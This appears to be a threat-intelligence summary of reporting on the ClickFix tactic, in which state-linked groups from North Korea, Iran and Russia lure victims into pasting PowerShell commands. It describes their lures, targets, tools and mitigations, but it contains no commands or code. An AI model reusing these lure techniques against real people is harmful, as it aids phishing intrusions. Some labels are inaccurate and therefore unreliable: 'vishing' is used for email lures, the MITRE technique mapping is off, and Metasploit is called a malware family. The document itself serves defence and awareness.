Full Report
ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks. [...]
Analysis Summary
# Threat Actor: State-Sponsored Hackers (General Trend/ClickFix Adopters)
## Attribution & Identity
The article details the adoption of the "ClickFix" social engineering tactic by multiple, distinct state-sponsored threat actors, including:
* **DPRK Hackers** (Likely referring to North Korean state-sponsored groups, potentially Kimsuky, though attribution is implied by context/pattern)
* **MuddyWater** (Iran-aligned group)
* **UNK\_RemoteRogue** (Mentioned as a Russian threat group)
* **APT28** (GRU unit, associated with Russian intelligence)
## Activity Summary
The actors exhibited activity between October 2024 and February 2025, leveraging the ClickFix tactic to trick victims into manually executing PowerShell commands.
* **DPRK Hackers (Jan–Feb 2025):** Targeted think tanks focused on North Korea policy using spoofed Japanese diplomat emails. Victims were tricked into running a PowerShell command found in a malicious PDF link to establish persistence and download QuasarRAT.
* **MuddyWater (Mid-Nov 2024):** Targeted 39 organizations in the Middle East using emails disguised as Microsoft security alerts demanding immediate critical updates, leading to deployment of their RMM tool, 'Level.'
* **UNK\_RemoteRogue (Dec 2024):** Targeted organizations related to a major arms manufacturer. Emails spoofed Microsoft Office, leading to a fake Word document landing page with Russian instructions/YouTube tutorial, executing PowerShell to connect to an Empire C2 server.
* **APT28 (As early as Oct 2024):** Used phishing emails mimicking Google Spreadsheets, complete with a reCAPTCHA step and PowerShell execution instructions via pop-up, resulting in SSH tunnel setup and Metasploit launch.
## Tactics, Techniques & Procedures
The overarching TTP highlighted is the use of **ClickFix**: convincing victims to manually copy and paste commands (often PowerShell) into a terminal.
* **Vishing/Spearphishing:** Used emails spoofed as Japanese diplomats, Microsoft security alerts, Microsoft Office documents, or Google Spreadsheets.
* **Execution of Malicious Scripts:** Manually executed PowerShell commands fetched secondary scripts.
* **Persistence:** Establishing persistence via scheduled tasks (DPRK).
* **Exfiltration/Espionage:** Use of RMM tools and RATs.
* **Command and Control (C2):** Use of Empire C2 framework.
* **Lateral Movement/Access:** Setting up SSH tunnels.
* **Evasion/Diversion:** Displaying decoy information (e.g., decoy PDF) to the victim after execution.
- **MITRE ATT&CK IDs (Inferred from tools/actions):** T1059.001 (PowerShell), T1547.001 (Registry Run Keys/Startup Folder/Scheduled Tasks).
## Targeting
* **Sectors:** Think tanks (North Korea policy), Organizations in the Middle East, Organizations related to a major arms manufacturer.
* **Geography:** Middle East, Targets associated with North Korea policy (implied international/US-based think tanks).
* **Victims:** Think tanks focused on North Korea-related policy; 39 unnamed organizations in the Middle East; Two organizations closely related to a major arms manufacturer.
## Tools & Infrastructure
* **Malware families used:** QuasarRAT, 'Level' (RMM tool), Metasploit.
* **Infrastructure (C2, domains, IPs):** Empire command and control (C2) framework. Server running Empire C2.
## Implications
The widespread adoption of the ClickFix tactic across state-sponsored actors from different geopolitical alignments (North Korea, Russia, Iran) indicates that this method is currently highly effective due to low user awareness regarding unsolicited command execution, especially when administrator privileges are involved. This suggests a high risk of initial access and subsequent espionage via seemingly benign, multi-step social engineering lures.
## Mitigations
* Users must never execute commands they do not fully understand or copy directly from external or unsolicited online sources, particularly if those commands require administrator privileges.
* Implement application control and integrity checks to restrict the execution of unsigned PowerShell scripts or execution from non-standard directories.
* Increase user awareness training specifically regarding the ClickFix social engineering vector, focusing on deceptive presentation layers (fake security alerts, official-looking documents).